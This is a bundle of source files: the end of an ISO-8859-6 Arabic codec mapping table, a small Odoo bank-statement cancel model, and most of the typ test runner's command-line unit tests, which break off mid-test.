'\x8e' # 0x8E -> <control>
'\x8f' # 0x8F -> <control>
'\x90' # 0x90 -> <control>
'\x91' # 0x91 -> <control>
'\x92' # 0x92 -> <control>
'\x93' # 0x93 -> <control>
'\x94' # 0x94 -> <control>
'\x95' # 0x95 -> <control>
'\x96' # 0x96 -> <control>
'\x97' # 0x97 -> <control>
'\x98' # 0x98 -> <control>
'\x99' # 0x99 -> <control>
'\x9a' # 0x9A -> <control>
'\x9b' # 0x9B -> <control>
'\x9c' # 0x9C -> <control>
'\x9d' # 0x9D -> <control>
'\x9e' # 0x9E -> <control>
'\x9f' # 0x9F -> <control>
'\xa0' # 0xA0 -> NO-BREAK SPACE
'\ufffe'
'\ufffe'
'\ufffe'
'\xa4' # 0xA4 -> CURRENCY SIGN
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\u060c' # 0xAC -> ARABIC COMMA
'\xad' # 0xAD -> SOFT HYPHEN
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\u061b' # 0xBB -> ARABIC SEMICOLON
'\ufffe'
'\ufffe'
'\ufffe'
'\u061f' # 0xBF -> ARABIC QUESTION MARK
'\ufffe'
'\u0621' # 0xC1 -> ARABIC LETTER HAMZA
'\u0622' # 0xC2 -> ARABIC LETTER ALEF WITH MADDA ABOVE
'\u0623' # 0xC3 -> ARABIC LETTER ALEF WITH HAMZA ABOVE
'\u0624' # 0xC4 -> ARABIC LETTER WAW WITH HAMZA ABOVE
'\u0625' # 0xC5 -> ARABIC LETTER ALEF WITH HAMZA BELOW
'\u0626' # 0xC6 -> ARABIC LETTER YEH WITH HAMZA ABOVE
'\u0627' # 0xC7 -> ARABIC LETTER ALEF
'\u0628' # 0xC8 -> ARABIC LETTER BEH
'\u0629' # 0xC9 -> ARABIC LETTER TEH MARBUTA
'\u062a' # 0xCA -> ARABIC LETTER TEH
'\u062b' # 0xCB -> ARABIC LETTER THEH
'\u062c' # 0xCC -> ARABIC LETTER JEEM
'\u062d' # 0xCD -> ARABIC LETTER HAH
'\u062e' # 0xCE -> ARABIC LETTER KHAH
'\u062f' # 0xCF -> ARABIC LETTER DAL
'\u0630' # 0xD0 -> ARABIC LETTER THAL
'\u0631' # 0xD1 -> ARABIC LETTER REH
'\u0632' # 0xD2 -> ARABIC LETTER ZAIN
'\u0633' # 0xD3 -> ARABIC LETTER SEEN
'\u0634' # 0xD4 -> ARABIC LETTER SHEEN
'\u0635' # 0xD5 -> ARABIC LETTER SAD
'\u0636' # 0xD6 -> ARABIC LETTER DAD
'\u0637' # 0xD7 -> ARABIC LETTER TAH
'\u0638' # 0xD8 -> ARABIC LETTER ZAH
'\u0639' # 0xD9 -> ARABIC LETTER AIN
'\u063a' # 0xDA -> ARABIC LETTER GHAIN
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\u0640' # 0xE0 -> ARABIC TATWEEL
'\u0641' # 0xE1 -> ARABIC LETTER FEH
'\u0642' # 0xE2 -> ARABIC LETTER QAF
'\u0643' # 0xE3 -> ARABIC LETTER KAF
'\u0644' # 0xE4 -> ARABIC LETTER LAM
'\u0645' # 0xE5 -> ARABIC LETTER MEEM
'\u0646' # 0xE6 -> ARABIC LETTER NOON
'\u0647' # 0xE7 -> ARABIC LETTER HEH
'\u0648' # 0xE8 -> ARABIC LETTER WAW
'\u0649' # 0xE9 -> ARABIC LETTER ALEF MAKSURA
'\u064a' # 0xEA -> ARABIC LETTER YEH
'\u064b' # 0xEB -> ARABIC FATHATAN
'\u064c' # 0xEC -> ARABIC DAMMATAN
'\u064d' # 0xED -> ARABIC KASRATAN
'\u064e' # 0xEE -> ARABIC FATHA
'\u064f' # 0xEF -> ARABIC DAMMA
'\u0650' # 0xF0 -> ARABIC KASRA
'\u0651' # 0xF1 -> ARABIC SHADDA
'\u0652' # 0xF2 -> ARABIC SUKUN
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
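# Editor's note: a hedged round-trip sketch for this mapping once it is
# registered by the ``encodings`` package; the byte values can be read
# straight off the decoding table above:
#
#     >>> '\u060c \u061f'.encode('iso8859-6')    # ARABIC COMMA, SPACE, ARABIC QUESTION MARK
#     b'\xac \xbf'
#     >>> b'\xac \xbf'.decode('iso8859-6') == '\u060c \u061f'
#     True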
|
wangjun/odoo | refs/heads/8.0 | addons/account_cancel/models/account_bank_statement.py | 96 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from openerp import models, api, _
from openerp.exceptions import Warning
class BankStatement(models.Model):
_inherit = 'account.bank.statement'
@api.multi
def button_draft(self):
self.state = 'draft'
class BankStatementLine(models.Model):
_inherit = 'account.bank.statement.line'
@api.multi
def cancel(self):
for line in self:
if line.statement_id.state == 'confirm':
raise Warning(_("Please set the bank statement to New before canceling."))
return super(BankStatementLine, self).cancel()
|
catapult-project/catapult | refs/heads/master | third_party/typ/typ/tests/main_test.py | 3 | # Copyright 2014 Dirk Pranke. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import json
import os
import sys
import textwrap
from typ import main
from typ import test_case
from typ import Host
from typ import VERSION
from typ.fakes import test_result_server_fake
from typ.fakes import host_fake
is_python3 = bool(sys.version_info.major == 3)
if is_python3: # pragma: python3
# pylint: disable=redefined-builtin,invalid-name
unicode = str
d = textwrap.dedent
ARTIFACTS_TEST_PY = """
import unittest
import os
from typ import test_case
class ArtifactTest(test_case.TestCase):
def test_produce_artifact_for_retries(self):
self.artifacts.CreateArtifact('artifact_name', 'test.txt', 'content')
self.fail()
"""
FLAKY_TEST_PY = """
import unittest
class FlakyTest(unittest.TestCase):
_retry_count = 0
def test_flaky(self):
cls = self.__class__
if cls._retry_count < 3:
cls._retry_count += 1
self.fail()
return
"""
SKIP_TEST_PY = """
import unittest
class SkipTest(unittest.TestCase):
def test_skip(self):
self.skipTest('SKIPPING TEST')
"""
SKIP_TEST_FILES = {'skip_test.py': SKIP_TEST_PY}
PASS_TEST_PY = """
import unittest
import time
class PassingTest(unittest.TestCase):
def test_pass(self):
# Add sleep to make the time assertion in
# main_test.TestCli.test_write_full_results_to not flaky.
time.sleep(0.1)
pass
"""
PASS_TEST_FILES = {'pass_test.py': PASS_TEST_PY}
FAIL_TEST_PY = """
import unittest
class FailingTest(unittest.TestCase):
def test_fail(self):
self.fail()
"""
FAIL_TEST_FILES = {'fail_test.py': FAIL_TEST_PY}
OUTPUT_TEST_PY = """
import sys
import unittest
class PassTest(unittest.TestCase):
def test_out(self):
sys.stdout.write("hello on stdout\\n")
sys.stdout.flush()
def test_err(self):
sys.stderr.write("hello on stderr\\n")
class FailTest(unittest.TestCase):
def test_out_err_fail(self):
sys.stdout.write("hello on stdout\\n")
sys.stdout.flush()
sys.stderr.write("hello on stderr\\n")
self.fail()
"""
OUTPUT_TEST_FILES = {'output_test.py': OUTPUT_TEST_PY}
SF_TEST_PY = """
import sys
import unittest
class SkipMethods(unittest.TestCase):
@unittest.skip('reason')
def test_reason(self):
self.fail()
@unittest.skipIf(True, 'reason')
def test_skip_if_true(self):
self.fail()
@unittest.skipIf(False, 'reason')
def test_skip_if_false(self):
self.fail()
class SkipSetup(unittest.TestCase):
def setUp(self):
self.skipTest('setup failed')
def test_notrun(self):
self.fail()
@unittest.skip('skip class')
class SkipClass(unittest.TestCase):
def test_method(self):
self.fail()
class SetupClass(unittest.TestCase):
@classmethod
def setUpClass(cls):
sys.stdout.write('in setupClass\\n')
sys.stdout.flush()
assert False, 'setupClass failed'
def test_method1(self):
pass
def test_method2(self):
pass
class ExpectedFailures(unittest.TestCase):
@unittest.expectedFailure
def test_fail(self):
self.fail()
@unittest.expectedFailure
def test_pass(self):
pass
"""
SF_TEST_FILES = {'sf_test.py': SF_TEST_PY}
LOAD_TEST_PY = """
import unittest
class BaseTest(unittest.TestCase):
pass
def method_fail(self):
self.fail()
def method_pass(self):
pass
def load_tests(_, _2, _3):
setattr(BaseTest, "a/b/fail", method_fail)
setattr(BaseTest, "a/b/pass", method_pass)
suite = unittest.TestSuite()
suite.addTest(BaseTest("a/b/fail"))
suite.addTest(BaseTest("a/b/pass"))
return suite
"""
LOAD_TEST_FILES = {'load_test.py': LOAD_TEST_PY}
path_to_main = os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
'runner.py')
class TestCli(test_case.MainTestCase):
prog = [sys.executable, path_to_main]
files_to_ignore = ['*.pyc']
def test_bad_arg(self):
self.check(['--bad-arg'], ret=2, out='',
rerr='.*: error: unrecognized arguments: --bad-arg\n')
self.check(['-help'], ret=2, out='',
rerr=(".*: error: argument -h/--help: "
"ignored explicit argument 'elp'\n"))
def test_bad_metadata(self):
self.check(['--metadata', 'foo'], ret=2, err='',
out='Error: malformed --metadata "foo"\n')
def test_basic(self):
self.check([], files=PASS_TEST_FILES,
ret=0,
out=('[1/1] pass_test.PassingTest.test_pass passed\n'
'1 test passed, 0 skipped, 0 failures.\n'), err='')
def test_coverage(self):
# TODO(crbug.com/1217850): Figure out why this isn't working
# in py3. Do we need to update coverage?
if sys.version_info.major == 3:
return
try:
import coverage # pylint: disable=W0612
files = {
'pass_test.py': PASS_TEST_PY,
'fail_test.py': FAIL_TEST_PY,
}
self.check(['-c', 'pass_test'], files=files, ret=0, err='',
out=d("""\
[1/1] pass_test.PassingTest.test_pass passed
1 test passed, 0 skipped, 0 failures.
Name Stmts Miss Cover
----------------------------------
fail_test.py 4 4 0%
pass_test.py 6 0 100%
----------------------------------
TOTAL 10 4 60%
"""))
except ImportError: # pragma: no cover
# We can never cover this line, since running coverage means
# that import will succeed.
self.check(['-c'], files=PASS_TEST_FILES, ret=1,
out='Error: coverage is not installed.\n', err='')
def test_debugger(self):
if sys.version_info.major == 3: # pragma: python3
return
else: # pragma: python2
_, out, _, _ = self.check(['-d'], stdin='quit()\n',
files=PASS_TEST_FILES, ret=0, err='')
self.assertIn('(Pdb) ', out)
def test_dryrun(self):
self.check(['-n'], files=PASS_TEST_FILES, ret=0, err='',
out=d("""\
[1/1] pass_test.PassingTest.test_pass passed
1 test passed, 0 skipped, 0 failures.
"""))
def test_error(self):
files = {'err_test.py': d("""\
import unittest
class ErrTest(unittest.TestCase):
def test_err(self):
foo = bar
""")}
_, out, _, _ = self.check([''], files=files, ret=1, err='')
self.assertIn('[1/1] err_test.ErrTest.test_err failed unexpectedly',
out)
self.assertIn('0 tests passed, 0 skipped, 1 failure', out)
def test_pass_repeat(self):
self.check(
['--repeat', '2'], files=PASS_TEST_FILES, ret=0, err='',
out=d("""\
[1/2] pass_test.PassingTest.test_pass passed
[2/2] pass_test.PassingTest.test_pass passed
1 test passed, 0 skipped, 0 failures.
"""))
def test_expectations(self):
files = {
'expectations.txt': d('''\
# tags: [ foo bar ]
# results: [ Failure ]
crbug.com/12345 [ foo ] fail_test.FailingTest.test_fail [ Failure ]
'''),
'fail_test.py': FAIL_TEST_PY,
}
# No tags are passed, so this should fail unexpectedly.
#_, out, _, _ = self.check(['-X', 'expectations.txt'],
# files=files, ret=1)
# A matching tag is passed, so the test should fail as expected.
self.check(['-X', 'expectations.txt', '-x', 'foo'], files=files, ret=0)
# A tag that doesn't match is passed, so the test should fail
# unexpectedly.
self.check(['-X', 'expectations.txt', '-x', 'bar'], files=files, ret=1)
# Passing a tag without an expectations file doesn't make sense.
self.check(['-x', 'bar'], files=files, ret=1)
def test_expectations_with_globs(self):
files = {
'expectations.txt': d('''\
# results: [ Failure ]
crbug.com/12345 fail_test.FailingTest.* [ Failure ]
'''),
'fail_test.py': FAIL_TEST_PY,
}
self.check(['-X', 'expectations.txt'], files=files, ret=0)
def test_multiple_expectations_files_do_not_work(self):
files = {
'expectations_1.txt': d('''\
# tags: [ foo bar ]
# results: [ Failure ]
crbug.com/12345 [ foo ] fail_test.FailingTest.test_fail [ Failure ]
'''),
'expectations_2.txt': d('''\
# tags: [ foo bar ]
# results: [ Skip ]
crbug.com/12345 [ foo ] fail_test.FailingTest.test_skip [ Skip ]
'''),
'fail_test.py': FAIL_TEST_PY,
}
# This isn't supported yet.
self.check(['-X', 'expectations_1.txt', '-X', 'expectations_2.txt',
'-x', 'foo'], files=files, ret=1)
def test_expectations_file_has_syntax_error(self):
files = {
'expectations.txt': d('''\
# tags: [
crbug.com/12345 [ foo ] fail_test.FailingTest.test_fail [ Failure ]
'''),
'fail_test.py': FAIL_TEST_PY,
}
self.check(['-X', 'expectations.txt', '-x', 'foo'], files=files, ret=1)
def test_fail(self):
_, out, _, _ = self.check([], files=FAIL_TEST_FILES, ret=1, err='')
self.assertIn('fail_test.FailingTest.test_fail failed unexpectedly',
out)
def test_fail_repeat(self):
_, out, _, _ = self.check(
['--repeat', '2'], files=FAIL_TEST_FILES, ret=1, err='')
self.assertIn(
'[1/2] fail_test.FailingTest.test_fail failed unexpectedly', out)
self.assertIn(
'[2/2] fail_test.FailingTest.test_fail failed unexpectedly', out)
def test_fail_then_pass(self):
files = {'fail_then_pass_test.py': d("""\
import unittest
count = 0
class FPTest(unittest.TestCase):
def test_count(self):
global count
count += 1
if count == 1:
self.fail()
""")}
_, out, _, files = self.check(['--retry-limit', '3',
'--write-full-results-to',
'full_results.json'],
files=files, ret=0, err='')
self.assertIn('Retrying failed tests (attempt #1 of 3)', out)
self.assertNotIn('Retrying failed tests (attempt #2 of 3)', out)
self.assertIn('1 test passed, 0 skipped, 0 failures.\n', out)
results = json.loads(files['full_results.json'])
self.assertEqual(
results['tests'][
'fail_then_pass_test']['FPTest']['test_count']['actual'],
'FAIL PASS')
def test_fail_then_pass_repeat(self):
files = {'fail_then_pass_test.py': d("""\
import unittest
count = 0
class FPTest(unittest.TestCase):
def test_count(self):
global count
count += 1
if count % 2 == 1:
self.fail()
""")}
_, out, _, files = self.check(['--retry-limit', '3',
'--write-full-results-to',
'full_results.json',
'--repeat', '2'],
files=files, ret=0, err='')
results = json.loads(files['full_results.json'])
self.assertIn('Retrying failed tests (attempt #1 of 3)', out)
self.assertNotIn('Retrying failed tests (attempt #2 of 3)', out)
self.assertEqual(
results['tests'][
'fail_then_pass_test']['FPTest']['test_count']['actual'],
'FAIL PASS FAIL PASS')
def test_fail_then_skip(self):
files = {'fail_then_skip_test.py': d("""\
import unittest
count = 0
class FPTest(unittest.TestCase):
def test_count(self):
global count
count += 1
if count == 1:
self.fail()
elif count == 2:
self.skipTest('')
""")}
_, out, _, files = self.check(['--retry-limit', '3',
'--write-full-results-to',
'full_results.json'],
files=files, ret=0, err='')
self.assertIn('Retrying failed tests (attempt #1 of 3)', out)
self.assertNotIn('Retrying failed tests (attempt #2 of 3)', out)
self.assertIn('0 tests passed, 1 skipped, 0 failures.\n', out)
results = json.loads(files['full_results.json'])
self.assertEqual(
results['tests'][
'fail_then_skip_test']['FPTest']['test_count']['actual'],
'FAIL SKIP')
def test_failures_are_not_elided(self):
_, out, _, _ = self.check(['--terminal-width=20'],
files=FAIL_TEST_FILES, ret=1, err='')
self.assertIn('[1/1] fail_test.FailingTest.test_fail failed '
'unexpectedly:\n', out)
def test_file_list(self):
files = PASS_TEST_FILES
self.check(['-f', '-'], files=files, stdin='pass_test\n', ret=0)
self.check(['-f', '-'], files=files, stdin='pass_test.PassingTest\n',
ret=0)
self.check(['-f', '-'], files=files,
stdin='pass_test.PassingTest.test_pass\n',
ret=0)
files = {'pass_test.py': PASS_TEST_PY,
'test_list.txt': 'pass_test.PassingTest.test_pass\n'}
self.check(['-f', 'test_list.txt'], files=files, ret=0)
def test_find(self):
files = PASS_TEST_FILES
self.check(['-l'], files=files, ret=0,
out='pass_test.PassingTest.test_pass\n')
self.check(['-l', 'pass_test'], files=files, ret=0, err='',
out='pass_test.PassingTest.test_pass\n')
self.check(['-l', 'pass_test.py'], files=files, ret=0, err='',
out='pass_test.PassingTest.test_pass\n')
self.check(['-l', './pass_test.py'], files=files, ret=0, err='',
out='pass_test.PassingTest.test_pass\n')
self.check(['-l', '.'], files=files, ret=0, err='',
out='pass_test.PassingTest.test_pass\n')
self.check(['-l', 'pass_test.PassingTest.test_pass'], files=files,
ret=0, err='',
out='pass_test.PassingTest.test_pass\n')
self.check(['-l', '.'], files=files, ret=0, err='',
out='pass_test.PassingTest.test_pass\n')
def test_find_from_subdirs(self):
files = {
'foo/__init__.py': '',
'foo/pass_test.py': PASS_TEST_PY,
'bar/__init__.py': '',
'bar/tmp': '',
}
self.check(['-l', '../foo/pass_test.py'], files=files, cwd='bar',
ret=0, err='',
out='foo.pass_test.PassingTest.test_pass\n')
self.check(['-l', 'foo'], files=files, cwd='bar',
ret=0, err='',
out='foo.pass_test.PassingTest.test_pass\n')
self.check(['-l', '--path', '../foo', 'pass_test'],
files=files, cwd='bar', ret=0, err='',
out='pass_test.PassingTest.test_pass\n')
def test_multiple_top_level_dirs(self):
files = {
'foo/bar/__init__.py': '',
'foo/bar/pass_test.py': PASS_TEST_PY,
'baz/quux/__init__.py': '',
'baz/quux/second_test.py': PASS_TEST_PY,
}
self.check(['-l', 'foo/bar', 'baz/quux'], files=files,
ret=0, err='',
out=(
'bar.pass_test.PassingTest.test_pass\n'
'quux.second_test.PassingTest.test_pass\n'
))
self.check(['-l', 'foo/bar/pass_test.py', 'baz/quux'], files=files,
ret=0, err='',
out=(
'bar.pass_test.PassingTest.test_pass\n'
'quux.second_test.PassingTest.test_pass\n'
))
self.check(['-l', '--top-level-dirs', 'foo', '--top-level-dirs', 'baz'],
files=files,
ret=0, err='',
out=(
'bar.pass_test.PassingTest.test_pass\n'
'quux.second_test.PassingTest.test_pass\n'
))
def test_list_with_repeat(self):
files = {
'foo/bar/__init__.py': '',
'foo/bar/pass_test.py': PASS_TEST_PY,
'baz/quux/__init__.py': '',
'baz/quux/second_test.py': PASS_TEST_PY,
}
self.check(['-l', 'foo/bar', 'baz/quux', '--repeat', '10'],
files=files,
ret=0, err='',
out=(
'bar.pass_test.PassingTest.test_pass\n'
'quux.second_test.PassingTest.test_pass\n'
))
def test_single_top_level_dir(self):
files = {
'foo/bar/__init__.py': '',
'foo/bar/pass_test.py': PASS_TEST_PY,
'baz/quux/__init__.py': '',
'baz/quux/second_test.py': PASS_TEST_PY,
}
self.check(['-l', '--top-level-dir', 'foo'],
files=files,
ret=0, err='',
out=(
'bar.pass_test.PassingTest.test_pass\n'
))
def test_can_not_have_both_top_level_flags(self):
files = {
'foo/bar/__init__.py': '',
'foo/bar/pass_test.py': PASS_TEST_PY,
'baz/quux/__init__.py': '',
'baz/quux/second_test.py': PASS_TEST_PY,
}
self.check(
['-l', '--top-level-dir', 'foo', '--top-level-dirs', 'bar'],
files=files,
ret=1, out='',
err='Cannot specify both --top-level-dir and --top-level-dirs\n')
def test_help(self):
self.check(['--help'], ret=0, rout='.*', err='')
def test_import_failure_missing_file(self):
_, out, _, _ = self.check(['-l', 'foo'], ret=1, err='')
self.assertIn('Failed to load "foo" in find_tests', out)
self.assertIn('No module named', out)
def test_import_failure_missing_package(self):
files = {'foo.py': d("""\
import unittest
import package_that_does_not_exist
class ImportFailureTest(unittest.TestCase):
def test_case(self):
pass
""")}
_, out, _, _ = self.check(['-l', 'foo.py'], files=files, ret=1, err='')
self.assertIn('Failed to load "foo.py" in find_tests', out)
self.assertIn('No module named', out)
def test_import_failure_no_tests(self):
files = {'foo.py': 'import unittest'}
self.check(['-l', 'foo'], files=files, ret=0, err='',
out='\n')
def test_import_failure_syntax_error(self):
files = {'syn_test.py': d("""\
import unittest
class SyntaxErrorTest(unittest.TestCase):
def test_syntax_error_in_test(self):
syntax error
""")}
_, out, _, _ = self.check([], files=files, ret=1, err='')
self.assertIn('Failed to import test module: syn_test', out)
self.assertIn('SyntaxError: invalid syntax', out)
def test_interrupt(self):
files = {'interrupt_test.py': d("""\
import unittest
class Foo(unittest.TestCase):
def test_interrupt(self):
raise KeyboardInterrupt()
""")}
self.check(['-j', '1'], files=files, ret=130, out='',
err='interrupted, exiting\n')
def test_isolate(self):
self.check(['--isolate', '*test_pass*'], files=PASS_TEST_FILES, ret=0,
out=('[1/1] pass_test.PassingTest.test_pass passed\n'
'1 test passed, 0 skipped, 0 failures.\n'), err='')
def test_load_tests_failure(self):
files = {'foo_test.py': d("""\
import unittest
def load_tests(_, _2, _3):
raise ValueError('this should fail')
""")}
_, out, _, _ = self.check([], files=files, ret=1, err='')
self.assertIn('this should fail', out)
def test_load_tests_single_worker(self):
files = LOAD_TEST_FILES
_, out, _, _ = self.check([
'-j', '1', '-v', '--test-name-prefix',
'load_test.BaseTest.'], files=files, ret=1, err='')
self.assertIn('[1/2] a/b/fail failed', out)
self.assertIn('[2/2] a/b/pass passed', out)
self.assertIn('1 test passed, 0 skipped, 1 failure.\n', out)
def test_load_tests_multiple_workers(self):
# TODO(crbug.com/1217853) Figure out why this isn't working under
# py3 and/or possibly running in parallel on mac.
if sys.platform in ('darwin', 'win32'):
return
_, out, _, _ = self.check([], files=LOAD_TEST_FILES, ret=1, err='')
# The output for this test is nondeterministic since we may run
# two tests in parallel. So, we just test that some of the substrings
# we care about are present.
self.assertIn('a/b/pass passed', out)
self.assertIn('a/b/fail failed', out)
self.assertIn('1 test passed, 0 skipped, 1 failure.\n', out)
def test_missing_builder_name(self):
self.check(['--test-results-server', 'localhost'], ret=2,
out=('Error: --builder-name must be specified '
'along with --test-result-server\n'
'Error: --master-name must be specified '
'along with --test-result-server\n'
'Error: --test-type must be specified '
'along with --test-result-server\n'), err='')
def test_ninja_status_env(self):
self.check(['-v', 'output_test.PassTest.test_out'],
files=OUTPUT_TEST_FILES, aenv={'NINJA_STATUS': 'ns: '},
out=d("""\
ns: output_test.PassTest.test_out passed
1 test passed, 0 skipped, 0 failures.
"""), err='')
def test_output_for_failures(self):
_, out, _, _ = self.check(['output_test.FailTest'],
files=OUTPUT_TEST_FILES,
ret=1, err='')
self.assertIn('[1/1] output_test.FailTest.test_out_err_fail '
'failed unexpectedly:\n'
' hello on stdout\n'
' hello on stderr\n', out)
def test_quiet(self):
self.check(['-q'], files=PASS_TEST_FILES, ret=0, err='', out='')
def test_retry_limit(self):
_, out, _, _ = self.check(['--retry-limit', '2'],
files=FAIL_TEST_FILES, ret=1, err='')
self.assertIn('Retrying failed tests', out)
lines = out.splitlines()
self.assertEqual(len([l for l in lines
if 'test_fail failed unexpectedly:' in l]),
3)
def test_skip(self):
_, out, _, _ = self.check(['--skip', '*test_fail*'],
files=FAIL_TEST_FILES, ret=0)
self.assertIn('0 tests passed, 1 skipped, 0 failures.', out)
files = {'fail_test.py': FAIL_TEST_PY,
'pass_test.py': PASS_TEST_PY}
self.check(['-j', '1', '--skip', '*test_fail*'], files=files, ret=0,
out=('[1/2] fail_test.FailingTest.test_fail was skipped\n'
'[2/2] pass_test.PassingTest.test_pass passed\n'
'1 test passed, 1 skipped, 0 failures.\n'), err='')
# This tests that we print test_started updates for skipped tests
# properly. It also tests how overwriting works.
_, out, _, _ = self.check(['-j', '1', '--overwrite', '--skip',
'*test_fail*'], files=files, ret=0,
err='', universal_newlines=False)
# We test this string separately and call out.strip() to
# avoid the trailing \r\n we get on windows, while keeping
# the \r's elsewhere in the string.
self.assertMultiLineEqual(
out.strip(),
('[0/2] fail_test.FailingTest.test_fail\r'
' \r'
'[1/2] fail_test.FailingTest.test_fail was skipped\r'
' \r'
'[1/2] pass_test.PassingTest.test_pass\r'
' \r'
'[2/2] pass_test.PassingTest.test_pass passed\r'
' \r'
'1 test passed, 1 skipped, 0 failures.'))
def test_skip_via_expectations(self):
files = {'expectations.txt':
'# results: [ Skip ]\ncrbug.com/23456 fail_test.FailingTest.test_fail [ Skip ]\n',
'fail_test.py': FAIL_TEST_PY,
'pass_test.py': PASS_TEST_PY}
self.check(['-X', 'expectations.txt'], files=files, ret=0)
def test_skips_and_failures(self):
_, out, _, _ = self.check(['-j', '1', '-v', '-v'], files=SF_TEST_FILES,
ret=1, err='')
# We do a bunch of assertIn()'s to work around the non-portable
# tracebacks.
self.assertIn(('[1/9] sf_test.ExpectedFailures.test_fail failed as expected:\n'
' Traceback '), out)
self.assertIn(('[2/9] sf_test.ExpectedFailures.test_pass '
'passed unexpectedly'), out)
self.assertIn(('[3/9] sf_test.SetupClass.test_method1 '
'failed unexpectedly:\n'
' in setupClass\n'), out)
self.assertIn(('[4/9] sf_test.SetupClass.test_method2 '
'failed unexpectedly:\n'
' in setupClass\n'), out)
self.assertIn(('[5/9] sf_test.SkipClass.test_method was skipped:\n'
' skip class\n'), out)
self.assertIn(('[6/9] sf_test.SkipMethods.test_reason was skipped:\n'
' reason\n'), out)
self.assertIn(('[7/9] sf_test.SkipMethods.test_skip_if_false '
'failed unexpectedly:\n'
' Traceback'), out)
self.assertIn(('[8/9] sf_test.SkipMethods.test_skip_if_true '
'was skipped:\n'
' reason\n'
'[9/9] sf_test.SkipSetup.test_notrun was skipped:\n'
' setup failed\n'
'1 test passed, 4 skipped, 4 failures.\n'), out)
def test_skip_and_all(self):
# --all should override --skip
_, out, _, _ = self.check(['--skip', '*test_pass'],
files=PASS_TEST_FILES, ret=0, err='')
self.assertIn('0 tests passed, 1 skipped, 0 failures.', out)
_, out, _, _ = self.check(['--all', '--skip', '*test_pass'],
files=PASS_TEST_FILES, ret=0, err='')
self.assertIn('1 test passed, 0 skipped, 0 failures.', out)
def test_skip_decorators_and_all(self):
_, out, _, _ = self.check(['--all', '-j', '1', '-v', '-v'],
files=SF_TEST_FILES, ret=1, err='')
self.assertIn('sf_test.SkipClass.test_method failed', out)
self.assertIn('sf_test.SkipMethods.test_reason failed', out)
self.assertIn('sf_test.SkipMethods.test_skip_if_true failed', out)
self.assertIn('sf_test.SkipMethods.test_skip_if_false failed', out)
# --all does not override explicit calls to skipTest(), only
# the decorators.
self.assertIn('sf_test.SkipSetup.test_notrun was skipped', out)
def test_sharding(self):
def run(shard_index, total_shards, tests):
files = {'shard_test.py': textwrap.dedent(
"""\
import unittest
class ShardTest(unittest.TestCase):
def test_01(self):
pass
def test_02(self):
pass
def test_03(self):
pass
def test_04(self):
pass
def test_05(self):
pass
""")}
_, out, _, _ = self.check(
['--shard-index', str(shard_index),
'--total-shards', str(total_shards),
'--jobs', '1'],
files=files)
exp_out = ''
total_tests = len(tests)
for i, test in enumerate(tests):
exp_out += ('[%d/%d] shard_test.ShardTest.test_%s passed\n' %
(i + 1, total_tests, test))
exp_out += '%d test%s passed, 0 skipped, 0 failures.\n' % (
total_tests, "" if total_tests == 1 else "s")
self.assertEqual(out, exp_out)
run(0, 1, ['01', '02', '03', '04', '05'])
run(0, 2, ['01', '03', '05'])
run(1, 2, ['02', '04'])
run(0, 6, ['01'])
def test_subdir(self):
files = {
'foo/__init__.py': '',
'foo/bar/__init__.py': '',
'foo/bar/pass_test.py': PASS_TEST_PY
}
self.check(['foo/bar'], files=files, ret=0, err='',
out=d("""\
[1/1] foo.bar.pass_test.PassingTest.test_pass passed
1 test passed, 0 skipped, 0 failures.
"""))
def test_timing(self):
self.check(['-t'], files=PASS_TEST_FILES, ret=0, err='',
rout=(r'\[1/1\] pass_test.PassingTest.test_pass passed '
r'\d+.\d+s\n'
r'1 test passed in \d+.\d+s, 0 skipped, 0 failures.'))
def test_test_results_server(self):
# TODO(crbug.com/1217853) Figure out why this isn't working under
# py3 (and/or possibly running in parallel on mac).
if sys.platform in ('darwin', 'win32'):
return
server = test_result_server_fake.start()
self.assertNotEqual(server, None, 'could not start fake server')
try:
self.check(['--test-results-server',
'http://%s:%d' % server.server_address,
'--master-name', 'fake_master',
'--builder-name', 'fake_builder',
'--test-type', 'typ_tests',
'--metadata', 'foo=bar'],
files=PASS_TEST_FILES, ret=0, err='',
out=('[1/1] pass_test.PassingTest.test_pass passed\n'
'1 test passed, 0 skipped, 0 failures.\n'))
finally:
posts = server.stop()
self.assertEqual(len(posts), 1)
payload = posts[0][2].decode('utf8')
self.assertIn('"test_pass": {"expected": "PASS", "actual": "PASS"',
payload)
self.assertTrue(payload.endswith('--\r\n'))
self.assertNotEqual(server.log.getvalue(), '')
# TODO(crbug.com/1032848) The typ unit tests hang whenever they run on
# mac with multiple processes. We need to investigate the root cause
# and fix it.
def disabled_test_test_results_server_error(self):
server = test_result_server_fake.start(code=500)
self.assertNotEqual(server, None, 'could not start fake server')
try:
self.check(['--test-results-server',
'http://%s:%d' % server.server_address,
'--master-name', 'fake_master',
'--builder-name', 'fake_builder',
'--test-type', 'typ_tests',
'--metadata', 'foo=bar'],
files=PASS_TEST_FILES, ret=1, err='',
out=('[1/1] pass_test.PassingTest.test_pass passed\n'
'1 test passed, 0 skipped, 0 failures.\n'
'Uploading the JSON results raised '
'"HTTP Error 500: Internal Server Error"\n'))
finally:
_ = server.stop()
# TODO(crbug.com/1032848) The typ unit tests hang whenever they run on
# mac with multiple processes. We need to investigate the root cause
# and fix it.
def disabled_test_test_results_server_not_running(self):
self.check(['--test-results-server', 'http://localhost:99999',
'--master-name', 'fake_master',
'--builder-name', 'fake_builder',
'--test-type', 'typ_tests',
'--metadata', 'foo=bar'],
files=PASS_TEST_FILES, ret=1, err='',
